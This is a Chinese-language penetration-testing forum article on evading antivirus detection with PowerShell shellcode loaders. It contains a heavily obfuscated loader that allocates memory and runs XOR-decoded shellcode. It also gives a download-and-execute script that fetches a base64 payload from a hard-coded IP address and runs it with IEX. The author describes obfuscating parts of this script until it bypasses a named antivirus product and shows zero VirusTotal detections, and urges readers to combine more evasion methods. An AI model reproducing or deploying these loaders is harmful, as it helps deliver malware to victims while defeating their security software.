69d117o79<80d52@117<119{117t73>117o81;98o119o49t98<88j73;70<55@98@71>70d52d72@86j115{70t55@113V72@115@72;73@118d66>70@113{67j57<111{113t72d115d47t73j118j67{111j74<54>103t105t56V54{112>110d66;119o100;52o101j69j74;54d101>88>76;99t119@51{116t56<101t97o103d120;121o75V86>43d83{48@49{71t86;121V78j76d86o69<112t78o83>110j100>76t98>49<81V70V74d78;122>50o69<116;120;48d100o72;82@48>100t69t115j90j100>86;113@69t51d80V98o75j112>121{77o106t73>51j103d83d54@110o74V121<83V83<66<121@99t107j117V100j78>105;77{106V99t72@78>76V100t75d113;56;53d100<122o50j121t70>78j52o69<118V70@120<83d121t77;104;89d54o100@120j99{88d70@119d99d88o78t76{121<72j89{78>71d78t122{50<113{117V87<103j52o72<77{83@51d72@82V48j83j100V120t119>100d85<115<79V74>84j116;89t51<80j97d109>52t121t121{110@52{67t73>106@73<120t76d99{112V116<86<88o74;54{114{97j121j67V112<76j105d101;98<66@102>116>122V50;113<117d74@76o90V103<74<57;69{116{122;50{69j116;120<48>83d83{82@121@100V88>78d76<108{72d84V68{75V78o122t50o110>67@77@77t73@121d77{97d53{70{101d85o69V116V122V75j115o105t73V106o73d56>114j113@73@105<77t106j121t54V106{99V51;78<119o77;86j50@104o109o101@121<79<77{73<72d102d83<43o114V117o71<101;105<90{114;68;76j115@115;99{86j117o50t97t52>70j114{70@43>70V53o76j86<48>105j65>82@120o53j111V73j86o87V115t53t116@74>97V56;57{102>122<56t47<53{81t108>120>75V72d111d83>118@66>97{97;115{71t89V53>57t98{119d78d79V56t54>113j71d114j98j65{87d77o52>54>77d83o68;77d54<105j72<47<43;112@78{70o107d73t51{90o81;82V108;69d79<89j107t82j71@84t86o99;90t65>50{53<77j87j85d112j80@84j48;73V77j70t103j48<84V65@119@116>65d84V69;53V84;81<108;100{75;81;85{57d71o71t65o78@117;99@71@112>109o65>120j73>84t68@82;77{89d65o51<82>75j84{85o100@77>86t70j65<68>98o88@99d68d70V81o48t82;71j65d78V48;98V72d81V86{70{120V103o68o100<49d70@75;82>48;90d78@86d119d119d86o68{82{77;89d65d50t53>105V100o50d70V112d99t65;111@117>75j83<80@50<87o118{82<82@53{121;52;52;85;54t74t105V69<73o104t113j97>56j50<122j115d102;71j100<102j99d109o47t80o73d85;99>76o47t89o110@109@43t119<80{109>69<51<89@55o82V74@49t122o70@74d49>102;120;89;57j81t48@71{101<54t105;114j85d109d72j88>74@120<103>113<78o120{121;50;90;117@43@76V72;81@88o90o82;55j122;56t104{51V111d122t105;105<114o117t86j54j71t56o103t77j122V102;121o106V117o85d115V120{115t102;54d51V97@71j112o79d113d112>78>47{82{82@106;81{54;100<98@107d108>118;56>88>48d102t56V122<65@97<118j80d98V90d50{113;112@111V53j65<113V111o114@70;74t114d110{88V54o121;102;113o97j90o117d101{106@84j70>115;47o87@50<119>67d65@79t80{115{111o120o69j68o82>70o115j104@100d115V112V76{70V98d98@106d71d67d116{68j66{102<105{119{75j84>106d109;80{110@49o87o56{53d55<112V84V86<75V104<117{114;50<49<113;113o69;110t89<74V47;119V77@74V107d89@70j68j113>77@47d75@43;43j103j68{109d111d68o90o100t115<67j65;53t101{77t56j118;79<52d76>71t57t103d122@57d76d70j67o66>57;100>100@101V71<70o119d97j105V78d76j48@53o97j66@100d100;122;50V83{87t78>76V73;122@77>106<73o48;115@106j73>50d77;106{100t69V116t55{104<51{68d71V51{80>97V119o109j105<77o106{73V121@77t105>43d110o74{119t113d115j82;48t83>121t77V68<73o121o78d119j100>85o115;120t116{97{114<66@51{80<97;109j52t49V102>108d113t67;81>105{52j75o98>106@86t115t90d55{52j77t117@75j51{116<122t99@70>120o81{78<69{104@73<81;68j82j69t83d70<65o48j83V69@82;115t106j77o82d100V49j87j119{61o61@39<41>10o10;102>111V114V32@40@36d120;32@61o32o48@59o32o36@120>32@45j108>116<32d36{118d97@114d95j99{111t100;101@46<67j111>117o110>116V59>32;36d120<43<43{41;32V123t10V9<36{118<97V114t95V99@111V100o101>91t36t120o93>32j61t32{36o118{97t114@95V99t111j100{101{91;36@120j93;32{45@98<120;111<114<32t51t53@10d125@10o10d36{118{97o114;95t118{97<32{61@32>91;83j121@115;116{101>109{46@82>117;110t116<105d109t101;46>73>110{116>101o114<111@112o83<101{114V118{105;99o101V115j46d77d97;114d115@104j97<108t93>58;58<71@101<116@68o101d108<101{103;97t116;101V70{111d114{70@117V110@99t116>105;111>110j80j111V105t110d116;101j114o40>40t102t117o110t99o95d103d101V116>95;112{114o111;99{95V97@100{100d114V101;115{115<32j107d101d114{110t101V108V51j50<46V100j108V108d32>86{105V114@116j117;97;108>65t108@108o111>99;41;44@32>40{102d117j110t99V95d103<101@116;95;100>101t108{101V103@97<116t101<95<116<121d112>101{32o64j40;91@73>110d116>80{116>114j93j44t32j91o85V73d110>116d51{50V93;44j32t91<85j73@110>116>51{50o93@44t32o91j85@73@110o116d51j50{93o41t32{40>91o73@110@116;80>116;114;93<41>41t41d10V36<118d97@114t95t98o117j102<102j101<114o32j61d32o36V118;97o114@95;118@97<46@73V110<118<111>107d101<40o91V73d110>116>80{116d114@93o58@58>90j101<114t111t44j32;36;118;97j114{95;99j111d100@101>46d76t101>110t103j116t104>44j32t48d120t51{48{48t48o44t32d48j120j52>48<41@10t91<83j121t115{116j101;109{46@82d117;110t116>105o109{101d46>73V110;116@101;114@111{112@83t101j114t118;105d99;101V115o46t77t97@114{115t104o97;108@93d58<58j67V111d112j121>40>36V118@97d114{95j99t111V100V101j44<32;48d44o32o36j118;97@114@95o98V117o102t102>101o114t44V32>36>118j97d114@95<99>111d100@101j46V108V101{110{103j116@104V41t10V10t36>118@97o114t95o114V117<110t109d101<32;61o32t91t83@121d115@116V101o109j46;82V117;110{116o105j109j101j46V73{110<116o101t114V111d112{83V101j114@118<105@99{101o115;46<77V97@114d115t104t97t108j93>58V58V71;101{116;68;101j108{101;103V97@116<101;70{111t114j70<117d110j99j116;105j111V110o80@111<105d110V116d101d114<40j36o118t97d114{95>98<117d102@102@101t114V44;32<40V102{117<110@99>95{103o101{116t95;100@101V108d101j103V97{116<101<95{116>121<112{101;32j64@40>91;73o110o116j80t116{114>93{41j32t40j91;86d111>105t100j93j41o41{41;10j36j118;97@114j95{114{117<110o109j101j46d73V110{118o111V107o101t40{91j73j110d116V80d116{114@93@58@58@90@101j114@111V41;10<39>64V10t10>73o102o32>40V91d73<110d116;80V116<114V93<58V58@115o105<122d101o32t45{101d113t32{56V41o32<123o10<9@115{116{97j114{116o45<106d111@98t32o123{32<112{97;114;97o109<40d36t97{41V32o73V69j88>32o36t97@32{125@32>45t82o117;110t65>115d51V50t32{45;65j114o103V117@109{101o110V116>32t36o68<111<73j116o32d124t32<119<97;105d116j45o106j111o98t32o124>32t82<101V99@101{105;118V101V45o74o111j98;10@125t10>101d108<115o101V32<123@10d9j73t69<88{32<36>68d111V73o116;10o125{10'-SPlit'd'-sPlIt '>'-sPLIT 'j' -SpLIT 'o' -SpLIt't'-SPLiT'V' -SPliT';' -splIT'{' -SPLIT'@'-SplIT'<' |%{([inT]$_ -AS[cHar])} )+"$(SET-ITeM 'vaRiaBLE:ofS' ' ') ") ``` 通过上面的实验又发现了什么问题呢?首先工具被杀的原因是什么呢?因为该工具已经被列入杀毒软件的指纹库,所以会被查杀,而powershell经过该工具混淆编码后还是被查杀,是由于杀毒软件已经检测到该编码后的内容是用该工具进行编码的,同样也会被查杀,这就好比菜刀、蚁剑、sqlmap等工具的流量等特征已经被明确的加入到杀毒软件的指纹库中,所以这些工具会被拦截。问题来了,既然会被查杀那么又有什么意义呢?换一种思路,刚刚我们是对所有的powershell脚本进行编码,那么如果我只对部分的代码进行编码又会出现什么样的情况呢? 这时我采用的是将第一开始经过base64编码的shellcode代码放置到远程服务器,然后下载执行。代码如下: ```php Set-StrictMode -Version 2 $DoIt= ((New-Object System.Net.Webclient).DownloadString('http://47.113.217.128/ssyy.txt'))//当然这里还可以对http拆分 $mksec=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($DoIt)) If ([IntPtr]::size -eq 8) { start-job { param($a) IEX $a } -RunAs32 -Argument $mksec | wait-job | Receive-Job } else { IEX $mksec } ``` 此时又会出现什么样的结果呢?此时某绒不查杀,而某60在执行的时候还是拦截。而现在要做的就是将上面的部分代码利用Invoke-Obfuscation工具来进行部分编码,那么现在我就是利用该工具依次尝试对每段代码进行编码,再对`start-job { param($a) IEX $a } -RunAs32 -Argument $mksec | wait-job | Receive-Job`进行处理后,某60成功绕过,并且成功上线。 这里选了第五个进行编码,其他自己尝试,因为有太多种可能。 [![](https://shs3.b.qianxin.com/attack_forum/2021/11/attach-96049f971dc326b9e4c8fc18105863d90784e675.png)](https://shs3.b.qianxin.com/attack_forum/2021/11/attach-96049f971dc326b9e4c8fc18105863d90784e675.png) 代码如下: ```php Set-StrictMode -Version 2 $DoIt= ((New-Object System.Net.Webclient).DownloadString('http://47.113.217.128/ssyy.txt')) $mksec=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($DoIt)) If ([IntPtr]::size -eq 8) { ( [RuNtime.INtERopserVIces.mArShAL]::([RunTiME.inTEROPservICeS.marshAL].GETmEmberS()[3].NAME).iNvOKe([RuNtImE.InteropSeRViCeS.MarSHAl]::SecUreSTriNGToBsTR( $('76492d1116743f0423413b16050a5345MgB8AFkALwBLAEIAdwA1AGsATQBiAGkATABNAGoAVgB2AE8AVQBJAEQAbQBSAGcAPQA9AHwAYwA4AGQAZgBkAGIAMQA1ADMAZQA4ADAAYwA5ADkAYQBiAGEAMQBlADgAMAA0ADQAZgAyAGIAMgBhADQAZAA1ADgAYQBjAGQAZQA5AGIAMQAwADYAZAA4AGQAZQAxAGEAZgBkAGUAZgA4ADkAMQAyADMAYgA2ADkAMgA4AGMAYQAxADUAMQBmADQANABkAGMAZgA2ADYAOQA4ADYAOAAxADUAMQAwAGEANwBmAGUANwAwADEAMwA1ADEAMgBlADkAOQAwADIAYgAxADgAZQAzAGYAYQBkADQAZgA1ADUAZgBiADcAOQBhAGYAZgA4ADcAOAAyAGQANwAzAGYAMgBiAGUAMQA2AGYAMgA0ADIAZQBjADUANwBiAGEANwBjADcAZgA3AGMAYwA2ADQAZQA5AGYANgBiAGQAYwA5ADIANwA5ADMAZgBlAGYAYwBlADMAZAAzADcAYgBhADMANAAzADEANABhADkAZgA1AGMANQAyADEAYgAzAGEAMQBjADYAYgA5ADMAOQAxAGEAMAA0ADQAOAAyADAAMAA4ADEANgBhADUAMgBiAGYAYgAyAGYAZgA4AGUAZQBkADkAOQAzAGMAMAA3ADcANwBlADIAZgA1AGYANQA3ADAAZQAyAGUAYwA1ADkAYwAyADYAOAAzADgANABiADQAZgBiAGUAZABiAGIAMQA2AGMAOABjAGIAZQBkADAAMQAzAGUANgBmADcAYQA5AGIAMgAwADUAMgBkAGEAMAA0AGUAZQA3AGQAMwAyADUAMABiADAAYQA5AGMAZAA2ADkAMwAyAGUAYgA2ADQANwBjADAAMAA3AGQAYwAwADQAZAA2ADQANAAxAGMAYgBmAGMAOAA3AGYAMgBmADAAYwA0ADAAOQAwADgAYgAzADcAOABmADUAZAA2ADMAMAA0AGQAMgBhAGMANQAyADgAOAAzADAAMwA2ADEAOAAxAGMAYQA3ADIAZQBjADMANwBhADUAZgBkADUAYwA5AGQAZABjADYAZQBlAGUAYQBkAGIAYgAxADcAOQAyAGMAOQBmADQAYQBiAGIAZQAxADMANwAxADAAMQBlAGUANAAzADIAMQAyAGEAOABmADAAZAAyAGQAYgAxAGUANQA1ADEAZAA2AGEANQBhAGEANwAwAGMAYwAwAGQANABjADQAZgA5AGIAMgA3AGIAYgBhAGEANAAzADEAZgAyAGIAZgBlAGMAYQBlAGQAOQAxADAANQAzADMANwAzADYAMgAwADcANAA1ADkAZABkADAA'|coNVERtTO-SeCuReSTrinG -k (40..63)) ) ))| .((Get-VarIABlE '*mDr*').nAME[3,11,2]-JOIn'') } else { IEX $mksec } ``` 此时拿去vt上查杀,免杀率为0 [![](https://shs3.b.qianxin.com/attack_forum/2021/11/attach-717d05420745420dc63ec6c085c6c443162bce28.png)](https://shs3.b.qianxin.com/attack_forum/2021/11/attach-717d05420745420dc63ec6c085c6c443162bce28.png) 这里需要强调一点,其实很多文章都有介绍一些免杀工具,很多免杀工具已经被杀毒软件列入指纹库,可以使用以上的方式,说不一定可以达到意想不到的效果。 总结 -- [![](https://shs3.b.qianxin.com/attack_forum/2021/11/attach-488d8295779caeee1328b597789f0c24f3b2445d.png)](https://shs3.b.qianxin.com/attack_forum/2021/11/attach-488d8295779caeee1328b597789f0c24f3b2445d.png) 通过以上的分析我们要能够学到什么?其实并不是说自己能够复现一遍就行,因为免杀只是暂时的,公布出来很快就会被列入指纹库,我们需要做的是要能够清楚的知道上面的免杀方式,能够将多种免杀思路进行结合,好比在web攻击中cors+xss打组合拳一样来提升危害,而免杀思路也是一样的,将这些排列组合,那么免杀的方式将非常多,在最后的一个免杀中,我还并未将所有的免杀方式进行融合,vt免杀效果就为0,要是将所有的融入呢?免杀效果又会怎么样呢?可以自己尝试。免杀也是一个不断尝试的过程,要敢于尝试。通过这篇文章希望你对其他语言进行免杀时也能够触类旁通。
发表于 2021-12-01 09:49:46
阅读 ( 7829 )
分类:
内网渗透
3 推荐
收藏
0 条评论
请先
登录
后评论
Honeypot
17 篇文章
×
发送私信
请先
登录
后发送私信
×
举报此文章
垃圾广告信息:
广告、推广、测试等内容
违规内容:
色情、暴力、血腥、敏感信息等内容
不友善内容:
人身攻击、挑衅辱骂、恶意行为
其他原因:
请补充说明
举报原因:
×
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!